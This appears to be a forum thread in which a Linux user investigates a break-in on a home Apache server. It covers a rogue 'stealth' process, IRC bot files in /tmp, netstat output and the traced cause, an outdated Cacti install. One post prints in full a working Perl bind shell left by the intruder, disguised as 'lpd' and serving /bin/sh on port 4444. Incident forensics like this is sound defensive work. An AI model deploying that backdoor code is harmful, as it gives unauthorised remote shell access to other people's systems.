Results 1 to 8 of 8
  1. #1
    Join Date
    Jun 2002
    Posts
    1,378

    * Apache "stealth" process? What is it?

    Can someone tell me what just happened?

    Background: I run a Linux desktop, but it's also facing the net (port 8080) as a webserver. (For services, it's providing ssh, http, samba, amphetadesk, and webmin. I'm NAT'ed, though, so only port 8080 is actually facing the public.)

    All of a sudden I couldn't get anywhere online, so I started investigating. While looking at network stats, I happened to notice one of my CPUs was spiked at full usage.

    top revealed a process known as "stealth" -- owned by user apache -- at 100% CPU usage.

    Anyone know what this is? Or where it came from? Unless they were really good (somehow breaching the router, getting into the LAN, and attacking me from there), the only port anyone could see was 8080, running Apache, so, assuming this was some exploit, that's how they got in.

    I'm going to poke through the logs to see if I can find anything. But has anyone seen this before that can offer some help?

  2. #2
    Join Date
    Jun 2002
    Posts
    1,378
    Code:
    # netstat --inet -W
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State      
    tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  
    tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759 CLOSE_WAIT  
    tcp      191      0 dehimifier:webcache     lj2536.inktomisearch.com:47502 CLOSE_WAIT  
    tcp        0      1 dehimifier:32822        mblk-d28.mblk.aol.com:ircd SYN_SENT    
    tcp        0      0 dehimifier:54685        oam-d10a.blue.aol.com:5190 TIME_WAIT   
    tcp       95      0 localhost:http          localhost:59978         CLOSE_WAIT  
    tcp        0      0 dehimifier:57204        caim-d04b.blue.aol.com:5190 TIME_WAIT   
    tcp        0      0 dehimifier:45874        64.12.25.20:5190        TIME_WAIT
    (dehimifier is my hostname)

    The blue.aol.com is my AIM connection; I signed off right before running it, which apparently put them in CLOSE_WAIT. I'm not sure what's going on with the ircd port. I don't really use IRC.

    I ran this the first time, note the IRC connection to another host:

    Code:
    # netstat --inet
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State      
    tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  
    tcp      288      0 dehimifier:webcache     lj2517.inktomisea:57759 CLOSE_WAIT  
    tcp      191      0 dehimifier:webcache     lj2536.inktomisea:47502 CLOSE_WAIT  
    tcp        0      1 dehimifier:32821        sodium.mlink.net:ircd   SYN_SENT    
    tcp        0      0 dehimifier:54685        oam-d10a.blue.aol.:5190 ESTABLISHED 
    tcp       95      0 localhost:http          localhost:59978         CLOSE_WAIT  
    tcp        0      0 dehimifier:57204        caim-d04b.blue.aol:5190 ESTABLISHED 
    tcp        0      0 dehimifier:45874        64.12.25.20:5190        ESTABLISHED 
    tcp        0      0 localhost:52749         localhost:http          FIN_WAIT2   
    tcp        0      0 localhost:59978         localhost:http          FIN_WAIT2

  3. #3
    Join Date
    Jun 2002
    Posts
    1,378
    Methinks someone's gotten in. I stopped Apache, but port 80 and 8080 (and 443) are still open. Playing with netstat options some more:

    Code:
    # netstat --inet -W -e -e
    Active Internet connections (w/o servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode     
    tcp      510      0 localhost:http          localhost:52749         CLOSE_WAIT  root       0          
    tcp        0      0 localhost:40460         localhost:webcache      ESTABLISHED n1zyy      2162851    
    tcp      288      0 dehimifier:webcache     lj2517.inktomisearch.com:57759 CLOSE_WAIT  root       0          
    tcp      191      0 dehimifier:webcache     lj2536.inktomisearch.com:47502 CLOSE_WAIT  root       0          
    tcp      514      0 localhost:webcache      localhost:40460         ESTABLISHED root       0          
    tcp       95      0 localhost:http          localhost:59978         CLOSE_WAIT  root       0          
    tcp        0      0 dehimifier:32823        oslo2.no.eu.undernet.org:ircd ESTABLISHED apache     2162790
    Note that I've got a new connection to Undernet, established. Also note that apache owns it.

    How do I stop an Apache process that isn't running?

    Edit: some more fun:

    Code:
    # ps aux | grep ^apache
    apache   27637  0.0  0.0   1316   324 ?        Ss   Jul10   0:00 bin/bsh
    apache   27697  0.0  0.1   1744   828 ?        Ss   Jul10   0:00 ./sendmail

  4. #4
    Join Date
    Jun 2002
    Posts
    1,378
    Looks like they were working out of /tmp.

    Some interesting entries:

    shell.pl
    Code:
    #!/usr/bin/perl
    use Socket;
    $port=4444;
    $proto=getprotobyname('tcp');
    $cmd="lpd";
    $system='/bin/sh';
    $0=$cmd;
    socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
    setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
    bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
    listen(SERVER, SOMAXCONN) or die "listen: $!";
    for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
       open(STDIN, ">&CLIENT");
       open(STDOUT, ">&CLIENT");
       open(STDERR, ">&CLIENT");
       system($system);
       close(STDIN);
       close(STDOUT);
       close(STDERR);
    }
    Code:
    # cd bin && ls -l
    total 20
    -rwxr-xr-x  1 apache apache 19426 May 19 15:41 bsh
    Also:
    Code:
    # ls -l /tmp/cycomm/
    total 1270
    -rw-r--r--  1 apache apache   2156 Jul 10 09:31 Makefile
    -rwxr-xr-x  1 apache apache  20358 Jan  1  2003 configure
    drwxr-xr-x  4 apache apache    128 May 28  2004 contrib
    -rw-r--r--  1 apache apache  22465 Jun 13  2001 cyc.help
    -rw-r--r--  1 apache apache   1047 Jul 11 14:00 cyc.levels
    -rw-------  1 apache apache      6 Jul 10 22:45 cyc.pid
    -rw-r--r--  1 apache apache    768 Jul 11 14:00 cyc.session
    -rwxr-xr-x  1 apache apache   2354 Jul 10 21:23 cyc.set
    -rwxr-xr-x  1 apache apache 592978 Jul 10 18:30 cycmech
    -rw-r--r--  1 apache apache     72 Jul 11 14:00 emech.users
    -rwxr-xr-x  1 apache apache   4147 Jan 22  2002 genuser
    -rwxr-xr-x  1 apache apache  14306 Jul  5 19:31 proc
    drwxr-xr-x  2 apache apache    304 May 28  2004 randfiles
    -rwxr-xr-x  1 apache apache 592978 Jul 10 18:30 sendmail
    drwxr-xr-x  2 apache apache   1208 Jul 10 18:30 src
    -rwxr-xr-x  1 apache apache  13399 Jul  5 07:38 stealth
    In there is the "stealth" process I saw, as well as the "sendmail" that showed up on a ps. Now to come off the net and ensure they can't do any more

  5. #5
    Join Date
    Jun 2002
    Posts
    1,378
    Okay, my apologies for the barrage of posts. I was sort of freaking out. As it's a desktop box, I have the luxury of just being able to pull it off the network and take my time. (I'm now on a laptop.)

    What I'm really interested in now is how they got in. I'd have expected it to be over ssh or something, but they really shouldn't have been able to. (Unless first getting into something else on the LAN here.)

    That "stealth" program is clearly no good:
    Code:
    # ./stealth -h
    
    twitch@Stealth:
    
    This tool is extremely dangerous. Use at your own risk!
    
    Usage: st-kill <host> <port>
    There's also a binary called sendmail, and the bin/bsh that they were running. "Reading" the binary of bin/bsh shows the string "You Have B4CKD0r3d this B0x....", along with references to things like memcpy, stdout, wapipid, strcopy, libc.so.6. (And tons of gibberish, since I'm looking at a binary file in vi.) Do you think (I can't find any information) that this is what was listening on port 80 / 8080 / 443? (I'd opened a telnet session to 80, but no matter what I typed, it didn't do anything.)

    Can anyone offer me help in tracking exactly how they got in?
    Last edited by fog; 07-11-2005 at 03:31 PM.

  6. #6
    Join Date
    Jun 2002
    Posts
    1,378
    Heh, think I found it. (Might I mention I'm suddenly glad I went with mod_log_sql? It's wonderful when you have to go searching.)

    Someone found me off of search.yahoo.com with a search phrase of "Please enter your cacti user name and password"

    It looks like older versions (<=0.8.6d) of cacti are vulnerable to remote command execution. Guess who's running 0.8.5a?

  7. #7
    Join Date
    Apr 2005
    Location
    Sweden
    Posts
    241
    Geez, you needed a lot of help from here eh?

    Kiddin, good work though. Next time you want to check out strings in a binary file there is the "strings" command (may or may not be installed) that can be easier than just looking though it with an editor.

    Typically if you see a box with a lot of junk in /tmp and not-so-carefully hidden processes, you can be almost sure its a vulnerability in a php or cgi script somewhere.

  8. #8
    This is May 4, 2011 and I have the same problem. I found your thread today with the same process running owning nearly 100% CPU. The only difference is that the owner of that process is guest instead of apache. I have Fedora 14, and all packages are up-to-date.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •